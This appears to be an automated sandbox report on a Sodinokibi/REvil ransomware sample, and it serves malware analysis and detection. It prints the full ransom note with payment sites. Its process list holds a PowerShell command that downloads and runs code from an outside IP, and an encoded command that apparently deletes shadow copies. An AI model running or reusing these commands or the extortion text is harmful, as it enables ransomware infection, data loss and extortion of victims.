Analysis

  • max time kernel
    137s
  • resource
    win7v191014
  • submitted
    01-01-2020 14:10

General

  • Target

    gUFmsNr9.bat

  • Sample

    200101-rpqtg1ratx

  • SHA256

    e43848480ada3d64317a1b5588e887d38eeef746d3ed3f7cfde1d2e5a5b5b099

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/gUFmsNr9

Extracted

Language
ps1
Source

Extracted

Path

C:\929lr-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 929lr. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F944365DCEA7D292 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/F944365DCEA7D292 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: WBUrBQxmt4SLUPRE2mWmM+m2NbVpphWdDfhXGpzyLs40gxHGnTJRZ1K49h6HHfsl 556LxGoR472JbS9OCqaLyq+RfXFRqNaGVhLmDOlALxDo8C3/DdYyG3bI/7SyPwQM hSfncen9TxmLYMTGXwmtMAjiaI8fyVuMyKPKJL7O33dE8iK/W+Ma/s6VKY+QAEyR X/qGTjIEbOBnD1OB/f6FwUudTUgx4wYXWIXgc/tLX0Gf0qXOjy1zE5v58jCNWbdO kxwoWi8vWzO7tEBr+xwTPZi4vyUIILSbpD8LmYNhTC9uNCXrb86VHW4nHWh81K9E gAnGVBNk/T2ODkXeiJmQ3c+RGtfO1RrkeSOgwk09PNCToFLGxJmtzZhZXoolGZUl XcO7xAZGA+5JL9k0c38hhJyI03iQ4Dun8EnTFfN2w3cGw4DNtVnH2OuflNgr5Gfm zoMIkh3InwaBCjA8yO2ffecHE5SkyXj+wOLTvZ3rjc3EL9tCpokWHYRloCxiXPrZ kNB8reHz1ftbltTUOpFxDmzdGLjYL+LzWjaI9p4Hll9S9N+NFV1Ih+mdFN4fMYgz 1hd2do/44MvnjsGVZEXrEkY5+OT8b7rmpuGABwc8ykAvK0dMAK/Tlww3bqYA/XnF 9Ep80my8rmFbYoj+0v8tuQenDCTbMEZ0WXC7HBwe603YnuUAmUGibWn+MPZ1tH+M nMguvrBC8Mr5R4SUroSGtu1VHHXmECo0FiG5XZqCAInurzIRkWzSjCN5PQNsh+n6 F0u1iddHFVt/2R+jpMnxb7XHbXrF3/lJDZ69kvxItwwpGP3taM+3cWHgOtuByeya XIdg7kQKA/mLUoiFe4cIQLrCX7qOM3OnLyoRjY+nU22llKbIXVWcVZerPj/VGOJ5 ZZfVfVU6SuBMiFGBX7LZzxM/tFbbqK4VLgXBZ0ssfzoxQVEnqktHjZPuSXDJknm8 CaVCYj52sTHAPQM2daZ/0ZWhfB6bORPxq+Gp70xIeDPZKKrmlizk83dWLw+OejhP /ugOS5+eoQOK9HJuNsVfxD5Hj1SMLjDVuryY7cITPpZBPfaLCvjmIF0wFkGFlWRZ JDvpTyWAHvxzgs+VPUqZftazTSYdCQlSrdLTEOzgMVeg8XSM0yj4rz2Q5Kaygke1 UJx41/F28+HQrA== Extension name: 929lr ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F944365DCEA7D292

http://decryptor.top/F944365DCEA7D292

Signatures

  • Drops file in System32 directory 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Discovering connected drives 3 TTPs 7 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Drops file in Program Files directory 33 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality

  • Suspicious use of WriteProcessMemory 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\gUFmsNr9.bat"
    1⤵
    • Discovering connected drives
    • Suspicious use of WriteProcessMemory
    PID:1232
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/gUFmsNr9');Invoke-MZKJMJKMN;Start-Sleep -s 10000"
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Discovering connected drives
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      PID:1224
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Discovering connected drives
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1152
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1460

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4628e689-d195-4873-bc54-2194d7d68777

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_512b5fbe-a222-4c41-85f8-7f61ee5ca5bd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c6be20a0-2b44-41e6-b03e-788e1380648b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c85534f7-abc2-478b-a265-18e03f17967d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_eb154db7-5347-459d-a5ae-f27e0827e401

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef13c2a6-fcdf-474f-b686-be9a419bd5e9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms